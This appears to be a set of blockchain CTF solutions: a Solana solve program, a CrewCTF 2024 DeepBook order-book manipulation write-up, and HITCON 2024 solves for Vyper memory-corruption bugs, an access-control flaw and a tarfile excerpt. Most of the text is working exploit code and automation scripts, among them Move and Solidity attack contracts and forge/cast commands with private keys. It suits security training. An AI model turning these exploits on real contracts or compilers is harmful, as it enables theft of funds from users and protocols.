#![cfg(not(feature = "no-entrypoint"))]

use std::ops::Deref;

use solana_program::declare_id;
use borsh::{BorshDeserialize, BorshSerialize};
use solana_program::account_info::next_account_info;
use solana_program::program::invoke;

use solana_program::{
    account_info::AccountInfo,
    entrypoint,
    entrypoint::ProgramResult,
    instruction::{AccountMeta, Instruction},
    pubkey::Pubkey,
    msg,
};
use std::rc::Rc;


declare_id!("So1bCJvDc3p3PoqbVB33h4qyHrPzikCeDfQ5kpAmjV6");



entrypoint!(process_instruction);
    fn process_instruction(
        program_id: &Pubkey,
        accounts: &[AccountInfo],
        instruction_data: &[u8],
    ) -> ProgramResult {

        let account_iter = &mut accounts.iter();
        let program = next_account_info(account_iter)?;
        let data_account = next_account_info(account_iter)?;
        let user = next_account_info(account_iter)?;
        let user_data = next_account_info(account_iter)?;
        let sp = next_account_info(account_iter)?;
        let livebonus = next_account_info(account_iter)?;
        let eventinfo = next_account_info(account_iter)?;
        let clock = next_account_info(account_iter)?;

        // for debug
        {
            let str = Rc::deref(&Rc::clone(&data_account.data)).borrow().deref();
            msg!(&format!("{:?}", Rc::deref(&Rc::clone(&data_account.data)).borrow().deref()));
            msg!(&format!("{:?}", data_account.owner));
        }

        //// register
        {
            let mut cont: Vec<u8> = vec![211, 124, 67, 15, 211, 194, 178, 240];

            let register = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(livebonus.key.clone(), false),
                    AccountMeta::new(eventinfo.key.clone(), false),
                    AccountMeta::new_readonly(sp.key.clone(), false),
                ],
            );
    
            invoke(&register, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    sp.clone(),
                    livebonus.clone(),
                    eventinfo.clone(),
                    clock.clone(),
            ]);
        }


        //// claim
        {
            let mut cont: Vec<u8> = vec![77, 150, 206, 136, 38, 221, 202, 1];
            // let mut cont2: Vec<u8> = vec![0, 0, 0, 0, 0, 0, 0, 0];

            // cont.append(&mut cont2);

            let claim = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(eventinfo.key.clone(), false),
                    AccountMeta::new_readonly(clock.key.clone(), false),
                ],
            );
    
            invoke(&claim, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    sp.clone(),
                    livebonus.clone(),
                    eventinfo.clone(),
                    clock.clone(),
            ]);
        }


        //// exchange
        {
            let mut cont: Vec<u8> = vec![47, 3, 27, 97, 215, 236, 219, 144];
            let mut cont2: Vec<u8> = vec![0, 0, 0, 0, 0, 0, 0, 0];

            cont.append(&mut cont2);

            let exchange = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(data_account.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(eventinfo.key.clone(), false),
                    AccountMeta::new(eventinfo.key.clone(), false),
                ],
            );
    
            invoke(&exchange, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    sp.clone(),
                    livebonus.clone(),
                    eventinfo.clone(),
                    clock.clone(),
            ]);
        }


        {
            let mut cont: Vec<u8> = vec![47, 3, 27, 97, 215, 236, 219, 144];
            let mut cont2: Vec<u8> = vec![0, 0, 0, 0, 0, 0, 0, 0];

            cont.append(&mut cont2);

            let exchange = Instruction::new_with_bytes(
                program.key.clone(),
                &cont,
                vec![
                    AccountMeta::new(data_account.key.clone(), false),
                    AccountMeta::new(user.key.clone(), true),
                    AccountMeta::new(eventinfo.key.clone(), false),
                    AccountMeta::new(eventinfo.key.clone(), false),
                ],
            );
    
            invoke(&exchange, 
                &[
                    user_data.clone(),
                    data_account.clone(),
                    user.clone(),
                    program.clone(),
                    sp.clone(),
                    livebonus.clone(),
                    eventinfo.clone(),
                    clock.clone(),
            ]);
        }

        Ok(())        
    }

# sample solve script to interface with the server
import pwn

# if you don't know what this is doing, look at server code and also sol-ctf-framework read_instruction:
# https://github.com/otter-sec/sol-ctf-framework/blob/rewrite-v2/src/lib.rs#L237
# feel free to change the accounts and ix data etc. to whatever you want
account_metas = [
    ("program", "-r"),  # read only
    ("data account", "-w"),  # writable
    ("user", "sw"),  # signer + writable
    ("user data", "sw"),
    ("system program", "-r"),
    ("livebonus", "-w"),  # writable
    ("eventinfo", "-w"),  # writable
    ("clock", "-r"),
]
instruction_data = b"placeholder"

HOST = "ibennto.chals.sekai.team"
# HOST = "127.0.0.1"
PORT = 1337
p = pwn.remote(HOST, PORT, ssl=True)

with open("./solve/target/deploy/solve.so", "rb") as f:
    solve = f.read()

p.sendlineafter(b"program pubkey: \n", b"So1bCJvDc3p3PoqbVB33h4qyHrPzikCeDfQ5kpAmjV6")
p.sendlineafter(b"program len: \n", str(len(solve)).encode())
p.send(solve)

accounts = {}
for l in p.recvuntil(b"num accounts: \n", drop=True).strip().split(b"\n"):
    [name, pubkey] = l.decode().split(": ")
    accounts[name] = pubkey

accounts["system program"] = "11111111111111111111111111111111"


from solders.pubkey import Pubkey
import base58
LIVE_BONUS_SEED = b"LiveBonus"
EVENT_INFO_SEED = b"EventInfo"

new_acct = Pubkey([0] * 31 + [0])
livebonus, _ = new_acct.find_program_address(
    seeds=[LIVE_BONUS_SEED, base58.b58decode(accounts['user'])],
    program_id=Pubkey(list(base58.b58decode(accounts['program']))),
)
eventinfo, _ = new_acct.find_program_address(
    seeds=[EVENT_INFO_SEED, base58.b58decode(accounts['user'])],
    program_id=Pubkey(list(base58.b58decode(accounts['program']))),
)

accounts["livebonus"] = livebonus
accounts["eventinfo"] = eventinfo
accounts["clock"] = "SysvarC1ock11111111111111111111111111111111"

print(accounts)

p.sendline(str(len(account_metas)).encode())
for name, perms in account_metas:
    p.sendline(f"{perms} {accounts[name]}".encode())
p.sendlineafter(b"ix len: \n", str(len(instruction_data)).encode())
p.send(instruction_data)

p.interactive()

CrewCTF 2024 - blockchain(lightbook)

gss1 — Mon, 5 Aug 2024 14:40:46 +0900

I create a sui move challenge in CrewCTF 2024, lightbook.

This is a 1-day challenge of deepbook-v2 based on https://github.com/MystenLabs/sui/commit/f2651e9bb0e40cdf24b2d0656a76f3f60f7847d2, which was my interesting finding from the codebase audited by zellic.

fix: level2 book status validation (#16919) · MystenLabs/sui@f2651e9

## Description Validation for get_level2_book_status_bid(ask)_side for price_low, price_high inputs. ## Test Plan How did you test the new or updated feature? Testnet deepbook pool t...

github.com

Root Cause

Deepbook uses an on-chain orderbook and employs a critbit tree to sort numerous orders.

When you send a query to the tree, it finds the key closest to the one you're searching for using critbit::find_closest_key.

If the tree contains the keys 10, 13, and 15, the key closest to 13 is, naturally, 13.

However, if the tree only contains 10 and 15, what would be the key closest to 13?

This question can extend to clob_v2::get_level2_book_status_{bid, ask}_side.

When we want to query orders between 10 and 15, but the tree lacks entries at 10 and 15, the query will find the closest keys. Let's call these low_closest_key and high_closest_key. For accurate results, the condition 10 <= low_closest_key <= high_closest_key <= 15 must be satisfied.

However, since the code doesn't guarantee this condition, the sparser tree, the greater the discrepancy between actual values and the query results could be.

Solve

bid_book: [1.94, 1.99]

ask_book: [2.01, 2.06]

1. set the ask_price to 2.06 and the bid_price to 2.05

2. run otter_strategy::execute

3. the key closest to 2.00 is 1.99, and the closest one to 2.05 is 2.05, orders of $1.99 would be removed.

4. set the bid_price to 2.05 again and repeat step 2, the closest key to 2.00 becomes 1.98.

Repeating this process will eventually empty the bid_book.

5. set the bid_price to 2.05 and place a bid around 1.88. this makes the closest key to 2.00 become 1.88, causing the otter_strategy to place an ask at 1.88, allowing you to buy at a lower price.

6. sell it back at a higher price using the otter_strategy and repeat steps 5 and 6 for profit.

fun fact) setting the bid_price to 1.94 and the ask_price to 1.95 will be failed due to the structure of the critbit tree.

a = r'''
        let lot_size: u64 = 10_000_000;
        let decimals: u64  = 1_000_000_000;
        let bid: bool = true;
        let u64_max: u64 = 18446744073709551615;
        let no_restriction: u8 = 0;
        let buy_threshold: u64 = 1_950_000_000;
        let limit: u64 = 2_000_000_000;
        let sell_threshold: u64 = 2_050_000_000;
        let crit: u64 = 1_880_000_000;

        let base_coin = ctf::get_airdrop_base(storage, 300 * decimals, ctx);
        let quote_coin = ctf::get_airdrop_quote(storage, 600 * decimals, ctx);

        let pool = ctf::get_mut_pool(storage);
        let account_cap: custodian_v2::AccountCap = clob_v2::create_account(ctx);
        


        let amount_hcoin = coin::value(&base_coin);
        let amount_cusd = coin::value(&quote_coin);
        let (remaining_hcoin, remaining_cusd) = clob_v2::place_market_order(
            pool,
            &account_cap,
            0,
            250 * decimals,
            !bid,
            coin::split(&mut base_coin, amount_hcoin, ctx),
            coin::split(&mut quote_coin, amount_cusd, ctx),
            clock,
            ctx,
        );

        coin::join(&mut base_coin, remaining_hcoin);
        coin::join(&mut quote_coin, remaining_cusd);


        let amount_hcoin = coin::value(&base_coin);
        let amount_cusd = coin::value(&quote_coin);
        let (remaining_hcoin, remaining_cusd) = clob_v2::place_market_order(
            pool,
            &account_cap,
            0,
            501 * decimals,
            bid,
            coin::split(&mut base_coin, amount_hcoin, ctx),
            coin::split(&mut quote_coin, amount_cusd, ctx),
            clock,
            ctx,
        );

        coin::join(&mut base_coin, remaining_hcoin);
        coin::join(&mut quote_coin, remaining_cusd);


        let amount_hcoin = coin::value(&base_coin);
        let amount_cusd = coin::value(&quote_coin);

        clob_v2::deposit_base(pool, base_coin, &account_cap);
        clob_v2::deposit_quote(pool, quote_coin, &account_cap);



        let i = 0;

        //// clear bids
        while(i <= 6) {
            clob_v2::place_limit_order<HCOIN, CUSD>(
                pool,
                0,
                sell_threshold,
                lot_size,
                0,
                bid,
                u64_max,
                no_restriction,
                clock,
                &account_cap,
                ctx,
            );
           
            otter_strategy::execute(
                pool,
                vault,
                !bid,
                clock,
                ctx,
            );

            i = i + 1;
        };


        let i = 0;
        while(i <= 20) {
            clob_v2::place_limit_order<HCOIN, CUSD>(
                pool,
                0,
                sell_threshold,
                lot_size,
                0,
                bid,
                u64_max,
                no_restriction,
                clock,
                &account_cap,
                ctx,
            );
            let (base_avail, base_locked, quote_avail, quote_locked) =  clob_v2::account_balance<HCOIN, CUSD>(pool, &account_cap);
            let amt = (((quote_avail as u128) * (decimals as u128) / (crit as u128)) as u64);
            clob_v2::place_limit_order<HCOIN, CUSD>(
                pool,
                0,
                crit,
                amt - (amt % lot_size),
                0,
                bid,
                u64_max,
                no_restriction,
                clock,
                &account_cap,
                ctx,
            );
            otter_strategy::execute(
                pool,
                vault,
                !bid,
                clock,
                ctx,
            );
            let (base_avail, base_locked, quote_avail, quote_locked) =  clob_v2::account_balance<HCOIN, CUSD>(pool, &account_cap);




            clob_v2::place_limit_order<HCOIN, CUSD>(
                pool,
                0,
                buy_threshold,
                lot_size,
                0,
                !bid,
                u64_max,
                no_restriction,
                clock,
                &account_cap,
                ctx,
            );
            let (base_avail, base_locked, quote_avail, quote_locked) =  clob_v2::account_balance<HCOIN, CUSD>(pool, &account_cap);
            clob_v2::place_limit_order<HCOIN, CUSD>(
                pool,
                0,
                limit,
                base_avail - base_avail % lot_size,
                0,
                !bid,
                u64_max,
                no_restriction,
                clock,
                &account_cap,
                ctx,
            );
            otter_strategy::execute(
                pool,
                vault,
                bid,
                clock,
                ctx,
            );

            i = i + 1;
        };




        let (base_avail, base_locked, quote_avail, quote_locked) =  clob_v2::account_balance<HCOIN, CUSD>(pool, &account_cap);

        let qcoin = clob_v2::withdraw_quote(
            pool,
            2500 * decimals,
            &account_cap,
            ctx,
        );

        ctf::solve(storage, &qcoin);

        transfer::public_transfer(account_cap, tx_context::sender(ctx));
        transfer::public_transfer(qcoin, tx_context::sender(ctx));
'''

import base64
bdata = base64.b64encode(a.encode('ascii', 'strict')).decode()

from pwn import *

r = remote("lightbook.chal.crewc.tf", 1337)

r.sendlineafter('your solve script using base64 encode:', bdata)

r.interactive()

HITCON CTF 2024 Quals(Lustrous, No-Exit Room, Flag Reader)

gss1 — Mon, 15 Jul 2024 03:17:18 +0900

I played HITCON CTF 2024 Quals with ColdFusion.

Lustorous

The challenge was written in Vyper langauge, it was my first time to take a look. I remember Vyper got an audit after the curve incident and there were no suspicious points in the code logic. So, I had a gut feeling that I needed to look for vulnerabilities in Vyper.

I found two resources we should read.

https://github.com/vyperlang/vyper/security

https://codehawks.cyfrin.io/c/2023-09-vyper-compiler/results?lt=contest&page=1&sc=reward&sj=reward&t=report

The public contest has identified so many bugs in 0.3.10, the same version as the chall.

Let's break down the task:

We need to create a gem and use it to battle a monster in a rock-paper-scissors game.

1. If we defeat the monster, we can attack it, reducing its health.

2. If we lose, the mosster attack us, reducing our health. The damage depends on ours hardness.

3. If there's a tie, nothing happens.

To win a stage:

1. Reduce the monster's health to zero

2. Ensure our health is greater than the monster's one

Otherwise, we lose the stage and rever to stage 0.

Note:

1. Our gem's attack power is very weak while the monster's attack doubles with each stage.

2. We can strengthen our gem by merging.

3. Only the admin(server) can initate a battle as our request.

4. We cannot predict the monster's actions since it is generated by randomly.

Here are the two key points we need to address:

How to win at rock-paper-scissors.
How to enhance the gem.

We can probably get through the first stage with a bit of luck, but for the second and third stages, we can't rely on luck alone. So, even if we can't kill the monsters, having a lot of health would allow us to at least force a draw in every rock-paper-scissors match.

The vulnerability below causes an overflow in the return data. Since we get our actions from master.get_actions() via an external call, this vulnerability is particularly relevant to our situation.

https://github.com/vyperlang/vyper/security/advisories/GHSA-gp3w-2v2m-p686

External calls can overflow return data to return input buffer

## Summary When calls to external contracts are made, we write the input buffer starting at byte 28, and allocate the return buffer to start at byte 0 (overlapping with the input buffer). When c...

github.com

The attack method is almost identical to the example provided there.

The caller expects to receive a dynamic array, so it interprets the first word of the return data as the array's location and copies the length from there. However, we can send any memory location that only requires a length check.

Since lunarian_actions: DynArray[uint8, MAX_ROUNDS] is stored in memory, we can copy those values directly into our gem_actions.

Looking at the memory map, lunarian_actions is located at a very low address while gem_actions is very high addres. To calculate the position, we use the opcode add offset, some number. By exploiting an overflow, we can achieve this movement.

Next, we need to finda way to win the battle against the 2nd and 3rd stage monsters.

A high vulnerability caught my eye:

https://github.com/vyperlang/vyper/security/advisories/GHSA-2q8v-3gqq-4f8p

concat built-in can corrupt memory

### Summary `concat` built-in can write over the bounds of the memory buffer that was allocated for it and thus overwrite existing valid data. The root cause is that the `build_IR` for `concat` d...

github.com

This is used in get_gem_id and seems very similar to PoC 1.

Referring to PoC 1, I examined the memory location with IR and found that in merge_gems, gem1 is loaded into memory. The subsequent get_gem_id seems to cause a memory overwrite.

According to the description, a one-byte overwrite occurs, so gem1 needs to be negative for it to result in a significantly large number.

256 + 32 + 1 = health's Most Significant Byte

            # Line 186
            /* gem_id: bytes32 = keccak256(concat(master_addr_bytes, sequence_bytes)) */ 
            [mstore,
              192,
              /* keccak256(concat(master_addr_bytes, sequence_bytes)) */ 
              [with,
                buf,
                /* concat(master_addr_bytes, sequence_bytes) */ 
                [with,
                  concat_ofst,
                  0,
                  [seq,
                    [mstore, [add, 256, concat_ofst], [mload, 128 <master_addr_bytes>]],
                    [set, concat_ofst, [add, concat_ofst, 20]],
                    [mstore, [add, 256, concat_ofst], [mload, 160 <sequence_bytes>]],
                    [set, concat_ofst, [add, concat_ofst, 4]],
                    [mstore, 224 <concat destination>, concat_ofst],
                    224 <concat destination>]],
                /* keccak256 */ [sha3, [add, buf, 32], [mload, buf]]]],

                        # Line 86
                        /* gem1: Gem = self.gems[self.get_gem_id(msg.sender, self.sequences[msg.sender] - 2)] */ 
                        [with,
                          _R,
                          /* self.gems[self.get_gem_id(msg.sender, self.sequences[msg.sender] - 2)] */ 
                          [sha3_64,
                            4 <self.gems>,
                            [mload,
                              /* self.get_gem_id(msg.sender, self.sequences[msg.sender] - 2) */ 
                              [seq,
                                [unique_symbol, self.get_gem_id(msg.sender, self.sequences[msg.sender] - 2)46],
                                [seq,
                                  [mstore, 64, caller <msg.sender>],
                                  [mstore,
                                    96,
                                    /* self.sequences[msg.sender] - 2 */ 
                                    [with,
                                      x,
                                      [sload,
                                        /* self.sequences[msg.sender] */ 
                                        [sha3_64,
                                          3 <self.sequences>,
                                          caller <msg.sender>]],
                                      /* uint32 bounds check */ 
                                      [with,
                                        val,
                                        [sub, x, 2 <2>],
                                        [seq, [assert, [iszero, [shr, 32, val]]], val]]]]],
                                [goto,
                                  internal_get_gem_id__address_uint32__runtime,
                                  448 <label2_return_buf>,
                                  [symbol, label2]],
                                [label, label2, var_list, pass],
                                448 <label2_return_buf>]]],
                          [seq,
                            [mstore, 288, [sload, _R]],
                            [mstore, 320, [sload, [add, _R, 1]]],
                            [mstore, 352, [sload, [add, _R, 2]]],
                            [mstore, 384, [sload, [add, _R, 3]]],
                            [mstore, 416, [sload, [add, _R, 4]]]]],

The final scenario is as follows:

1. Start with 1.5 Ether and create a gem, then win one battle (retry if failed).
2. Use the 1 Ether reward to create another gem.
3. Engage in a battle until the gem becomes inactive.
4. Continue battling until the gem's health is negative, then enter master.decide_continue_battle.
5. Use merge_gem to increase the health to near infinity.
6. Tie every rock-paper-scissors match, relying on the high health to win all stages.

To get the optimal gem, I attempted to find which block numbers produce the best gems.

from web3 import Web3

def get_random(num):
    block_number_bytes = num.to_bytes(32, byteorder='big')
    keccak256_hash = Web3().solidity_keccak(['bytes32'], [block_number_bytes])
    int256_value = int.from_bytes(keccak256_hash, byteorder='big', signed=True)
    return abs(int256_value)

solve

contract Solve{

    address public vyper_address;

    constructor(address chall) payable {
        vyper_address = chall;
    }

    function register_master() public {
        (bool res, bytes memory ret) = vyper_address.call(abi.encodeWithSignature("register_master()"));
        require(res);
    }

    function create_gem() public {
        (bool res, bytes memory ret) = vyper_address.call{value: 1 ether}(abi.encodeWithSignature("create_gem()"));
        require(res);
    }

    function merge_gems() public {
        (bool res, bytes memory ret) = vyper_address.call(abi.encodeWithSignature("merge_gems()"));
        require(res);
    }

    function pray_gem() public {
        (bool res, bytes memory ret) = vyper_address.call(abi.encodeWithSignature("pray_gem()"));
        require(res);
    }

    function assign_gem(uint32 i) public {
        (bool res, bytes memory ret) = vyper_address.call(abi.encodeWithSignature("assign_gem(uint32)", i));
        require(res);
    }

    function continue_battle() public  {
        (bool res, bytes memory ret) = vyper_address.call{value: 1 ether}(abi.encodeWithSignature("continue_battle()"));
        require(res);
    }


    receive() external payable { }


    uint public num = 0;
    uint public stage_num = 0;

    function get_actions() public view returns(uint8[] memory)  {
        

        if (num == 0) {
            uint8[] memory arr = new uint8[](100 * stage_num);
            // win
            for (uint i = 0; i < 100 * stage_num; i++) {
                arr[i] = 0;
            }
            return arr;

        }
        else if (num == 1) {
            uint8[] memory arr = new uint8[](100 * stage_num);
            // lose
            for (uint i = 0; i < 100 * stage_num; i++) {
                arr[i] = 1;
            }
            return arr;

        }

        else if (num == 2){
            assembly {
                mstore(0x40, 115792089237316195423570985008687907853269984665640564039457584007913129620544)
                mstore(0x60, 200)
                return(0x40, 0x40) 
            }
        }

        
        else if (num == 11){
            assembly {
                mstore(0x40, 115792089237316195423570985008687907853269984665640564039457584007913129620544)
                mstore(0x60, 100)
                return(0x40, 0x40) 
            }
        }

        else if (num == 22){
            assembly {
                mstore(0x40, 115792089237316195423570985008687907853269984665640564039457584007913129620544)
                mstore(0x60, 200)
                return(0x40, 0x40) 
            }
        }

        else if (num == 33){
            assembly {
                mstore(0x40, 115792089237316195423570985008687907853269984665640564039457584007913129620544)
                mstore(0x60, 300)
                return(0x40, 0x40) 
            }
        }

    }

    function bn_74() public {
        register_master();
        create_gem();
 
    }

    function bn_74_1() public {
        num = 0;
        stage_num = 1; 
        // stage();
    }

    function bn_74_2() public {
        num = 2;
        stage_num = 2; 
        // stage();  
    }

    uint public decide = 0;

    function bn_86() public {
        create_gem();
        assign_gem(1);
    }

    function bn_86_1() public {
        num = 1;
        stage_num = 1;
        // stage();
        //// inactive
    }

    function bn_86_2() public {
        assign_gem(0);
        num = 1;
        stage_num = 1;
        decide = 1;
        // stage();
    }

    function bn_86_3() public {
        num = 22;
        stage_num = 2;
        // stage();
    }

    function bn_86_4() public {
        num = 33;
        stage_num = 3;
        // stage();
    }

    function decide_continue_battle(uint256 round, int256 lunarian_health) public returns(bool) {
        if(decide == 0) return false;
        merge_gems();

        return false;
    }
}

from pwn import *
from web3 import Web3
import json
import time

import hashlib

import warnings
warnings.filterwarnings('ignore')

def pow(preimage_prefix, length):
    bits = int(length)

    for i in range(0, 1 << 32):
        your_input = str(i).encode()
        preimage = preimage_prefix + your_input
        digest = hashlib.sha256(preimage).digest()
        digest_int = int.from_bytes(digest, "big")
        if digest_int < (1 << (256 - bits)):
            return your_input

def battle(uuid):
    r = remote("lustrous.chal.hitconctf.com", 31337)
    r.sendlineafter("action?", "3")
    r.recvuntil("https://minaminao.github.io/tools/solve-pow.py) ")
    preimage_prefix = r.recvuntil(" ")[:-1]
    length = r.recvline()[:-1]
    your_input = pow(preimage_prefix, length)
    r.sendlineafter("YOUR_INPUT = ", your_input)
    r.sendlineafter("uuid please: ", uuid)
    r.close()

def flag(uuid):
    r = remote("lustrous.chal.hitconctf.com", 31337)
    r.sendlineafter("action?", "4")
    r.sendlineafter("uuid please: ", uuid)
    r.interactive()




while True:


    r = remote("lustrous.chal.hitconctf.com", 31337)

    r.sendlineafter("action?", "1")

    r.recvuntil("https://minaminao.github.io/tools/solve-pow.py) ")
    preimage_prefix = r.recvuntil(" ")[:-1]
    length = r.recvline()[:-1]


    your_input = pow(preimage_prefix, length)

    r.sendlineafter("YOUR_INPUT = ", your_input)


    r.recvuntil("uuid:               ")
    uuid = r.recvline()[:-1].decode()
    r.recvuntil("rpc endpoint:       ")
    rpc_url = r.recvline()[:-1].decode()
    r.recvuntil("private key:        ")
    prikey = r.recvline()[:-1].decode()
    r.recvuntil("your address:       ")
    my_addr = r.recvline()[:-1].decode()
    r.recvuntil("challenge contract: ")
    challenge_addr = r.recvline()[:-1].decode()
    r.close()




    w3 = Web3(Web3.HTTPProvider(rpc_url))
    #Check Connection
    t=w3.is_connected()
    print(t)


    f = open("solve.abi", "r"); contract_abi= f.read(); f.close()
    f = open("solve.bin", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(challenge_addr).build_transaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": my_addr,
            "nonce": w3.eth.get_transaction_count(my_addr),
            "value": 10**18,
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")

    cont_addr = transaction_receipt.contractAddress
    contract = w3.eth.contract(address=cont_addr, abi=contract_abi, bytecode=contract_bytecode)

    time.sleep(10)

    while True:
        bn = w3.eth.get_block_number()
        print(bn)

        if bn == 73:
            func_call = contract.functions["bn_74"]().build_transaction({
                "from": my_addr,
                "nonce": w3.eth.get_transaction_count(my_addr),
                "gasPrice": w3.eth.gas_price,
                "chainId": w3.eth.chain_id,
            })
            signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
            result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
            transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
            print(transaction_receipt)

            func_call = contract.functions["bn_74_1"]().build_transaction({
                "from": my_addr,
                "nonce": w3.eth.get_transaction_count(my_addr),
                "gasPrice": w3.eth.gas_price,
                "chainId": w3.eth.chain_id,
            })
            signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
            result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
            transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
            print(transaction_receipt)
            battle(uuid)
            sleep(5.5)

            if w3.eth.get_balance(cont_addr) == 0:
                print("restart")
                break

            func_call = contract.functions["bn_74_2"]().build_transaction({
                "from": my_addr,
                "nonce": w3.eth.get_transaction_count(my_addr),
                "gasPrice": w3.eth.gas_price,
                "chainId": w3.eth.chain_id,
            })
            signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
            result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
            transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
            print(transaction_receipt)
            battle(uuid)
            sleep(5.5)

            continue


        if bn == 85:
            func_call = contract.functions["bn_86"]().build_transaction({
                "from": my_addr,
                "nonce": w3.eth.get_transaction_count(my_addr),
                "gasPrice": w3.eth.gas_price,
                "chainId": w3.eth.chain_id,
            })
            signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
            result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
            transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
            print(transaction_receipt)

            func_call = contract.functions["bn_86_1"]().build_transaction({
                "from": my_addr,
                "nonce": w3.eth.get_transaction_count(my_addr),
                "gasPrice": w3.eth.gas_price,
                "chainId": w3.eth.chain_id,
            })
            signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
            result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
            transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
            print(transaction_receipt)
            battle(uuid)
            sleep(5.5)

            func_call = contract.functions["bn_86_2"]().build_transaction({
                "from": my_addr,
                "nonce": w3.eth.get_transaction_count(my_addr),
                "gasPrice": w3.eth.gas_price,
                "chainId": w3.eth.chain_id,
            })
            signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
            result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
            transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
            print(transaction_receipt)
            battle(uuid)
            sleep(5.5)

            func_call = contract.functions["bn_86_3"]().build_transaction({
                "from": my_addr,
                "nonce": w3.eth.get_transaction_count(my_addr),
                "gasPrice": w3.eth.gas_price,
                "chainId": w3.eth.chain_id,
            })
            signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
            result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
            transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
            print(transaction_receipt)
            battle(uuid)
            sleep(5.5)

            func_call = contract.functions["bn_86_4"]().build_transaction({
                "from": my_addr,
                "nonce": w3.eth.get_transaction_count(my_addr),
                "gasPrice": w3.eth.gas_price,
                "chainId": w3.eth.chain_id,
            })
            signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
            result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
            transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
            print(transaction_receipt)
            battle(uuid)
            sleep(5.5)

            sleep(1)
            flag(uuid)
            exit(0)

        sleep(1)

no exit room

There is no access control in Beacon.sol

solve

contract Solve {

    Setup public setup;
    Beacon public beacon;
    Channel public channel;
    Protocol public protocol;
    Room public alice;
    Room public bob;
    Room public david;


    constructor(address _setup) {
        setup = Setup(_setup);

        alice = setup.alice();
        bob = setup.bob();
        david = setup.david();
        beacon = setup.beacon();

        beacon.update(address(this));        
    }

    function solve() public {
        alice.request(address(bob), 10);
        alice.request(address(david), 11);
        bob.request(address(alice), 12);
        bob.request(address(david), 13);
        david.request(address(alice), 14);
        david.request(address(bob), 15);

        alice.selfRequest(16);
        bob.selfRequest(17);
        david.selfRequest(18);

        int256[] memory yvs = new int256[](0);
        alice.solveRoomPuzzle(yvs);
        bob.solveRoomPuzzle(yvs);
        david.solveRoomPuzzle(yvs);

        setup.commitPuzzle(116);

        require(setup.isSolved());
    }


    function evaluate(int256[] memory polynomial, int256 x) external pure returns (int256) {
        return x;
    }

    function evaluateLagrange(int256[] memory xValues, int256[] memory yValues, int256 x)
        external
        pure
        returns (int256 ret)
    {
        return x;
    }
}

// forge init --force
// forge create Solve --rpc-url http://no-exit-room.chal.hitconctf.com:8545/d6f01da9-d0f9-4cc8-ba53-48ce869b2434 --private-key 0x2c84dbc071d23774d1d7756226d3c0bc01a8a2c586f8979e1748ebd2999b5dd1 --constructor-args 0x48C41b1Db24b70465f12c5F8740063D7713002a9
// cast send 0x08e095BDEb4965F62Af6eaf5c0c9bf98B32F6CEE --rpc-url http://no-exit-room.chal.hitconctf.com:8545/d6f01da9-d0f9-4cc8-ba53-48ce869b2434 --private-key 0x2c84dbc071d23774d1d7756226d3c0bc01a8a2c586f8979e1748ebd2999b5dd1 "solve()"

flag reader

# tarfile.py

def nts(s, encoding, errors):
    """Convert a null-terminated bytes object to a string.
    """
    p = s.find(b"\0")
    if p != -1:
        s = s[:p]
    return s.decode(encoding, errors)

def nti(s):
    """Convert a number field to a python number.
    """
    # There are two possible encodings for a number field, see
    # itn() below.
    if s[0] in (0o200, 0o377):
        n = 0
        for i in range(len(s) - 1):
            n <<= 8
            n += s[i + 1]
        if s[0] == 0o377:
            n = -(256 ** (len(s) - 1) - n)
    else:
        try:
            s = nts(s, "ascii", "strict")
            n = int(s.strip() or "0", 8)
        except ValueError:
            raise InvalidHeaderError("invalid header")
    return n



    @classmethod
    def frombuf(cls, buf, encoding, errors):
# ...
		obj = cls()
        obj.name = nts(buf[0:100], encoding, errors)
        obj.mode = nti(buf[100:108])
        obj.uid = nti(buf[108:116])
        obj.gid = nti(buf[116:124])
        obj.size = nti(buf[124:136])
        obj.mtime = nti(buf[136:148])
        obj.chksum = chksum
        obj.type = buf[156:157]
        obj.linkname = nts(buf[157:257], encoding, errors)
        print(encoding, errors)
        obj.uname = nts(buf[265:297], encoding, errors)
        obj.gname = nts(buf[297:329], encoding, errors)
